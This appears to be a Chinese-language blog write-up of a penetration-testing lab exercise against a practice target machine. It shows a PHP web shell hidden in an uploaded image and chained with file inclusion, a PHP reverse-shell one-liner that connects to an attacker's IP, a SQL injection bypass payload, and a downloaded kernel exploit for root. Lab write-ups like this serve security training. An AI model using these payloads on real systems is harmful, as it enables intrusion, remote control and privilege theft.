靶机练习--5
目录
主机发现
端口扫描
端口服务版本,操作系统扫描
22 ssh可尝试暴力破解
apache可查询其版本漏洞
web端开找
一个登陆点
尝试弱口令,万能密码sql注入
看起来是把我的单引号过滤了
目录扫描
找找有用的
这有一个文件上传,但是貌似不知道上传到哪里了
这里直接有一个phpinfo
暴露了其绝对路径
允许本地文件包含
这个页面,让我们输入文件路径,可能有文件包含漏洞
包含一下,发现没有效果
试试post传参
结果触发了一个下载,存在任意文件下载漏洞
抓包能直接看
包含一下刚才扫出来的空白页,发现可以找到一个用户名密码
在这个登陆点试试,发现登不上去
ssh也连不上去。。。没有登陆点了呀
换个大字典再扫一遍目录
访问看看
phpmyadmin
发现了一个phpmyadmin的后台登陆页面
刚好有个账户密码不知道在哪试
登陆成功
然后在这里面也找到了一个用户名密码
把这个在网站主页试试
登上来一个新页面
看看有啥有用的,这里貌似是一个图片保存库,还可以上传
查看其源码,发现其存在文件包含
continue以后,会以post接受一个load,然后再去包含
这里我们可以看到有图片路径
上传一个图片马,命令执行代码来配合文件包含
<?php system($_GET[cmd]); ?>
再来到这个首页抓包
抓那个continue的包
修改load里去包含存在命令执行脚本的图片(文件包含时会优先执行里面的代码,不用管后缀)
上面直接添加get参数,去传参执行命令
getshell
此时,可以尝试反弹shell
php -r '$sock=fsockopen("192.168.129.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 将上面的代码进行url编码后,传给cmd,去执行命令
kali这里提前监听,至此,getshell
提权
搜索内核版本漏洞
37292.c 本地提权
将其复制到apache根目录,让靶机远程下载
下载,编译,运行
提权成功
附加
1.在phpmyadmin默认配置里找到root的密码
其实还可以去包含很多东西,进行代码审计
在网上可以找到,phpmyadmin的配置文件,默认在 /var/www/phpmy/config.inc.php
这里就爆出了系统root用户的密码
2.通过代码审计来绕过主页sql注入的限制
uname和pass传进去的值通过urldecode编码之后,将字符中的\’替换成空格
在使用普通的万能密码 'or 1=1# 时,他登不上去
但是在里面加入 \ 时,搜索语句就就会成为
select * from auth where pass=' or 1=1# and uname=' or 1=1#'
就可以进行绕过
总结
- 在找到用户名&密码时,可以对其每个登陆点都试试,有人懒得记密码,全网都是一个密码
- 遇到文件包含时,可以去包含所有敏感文件及扫出来的东西,进行代码审计,信息收集是关键
- 同时有文件上传+文件包含,基本就可以getshell了
2521
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
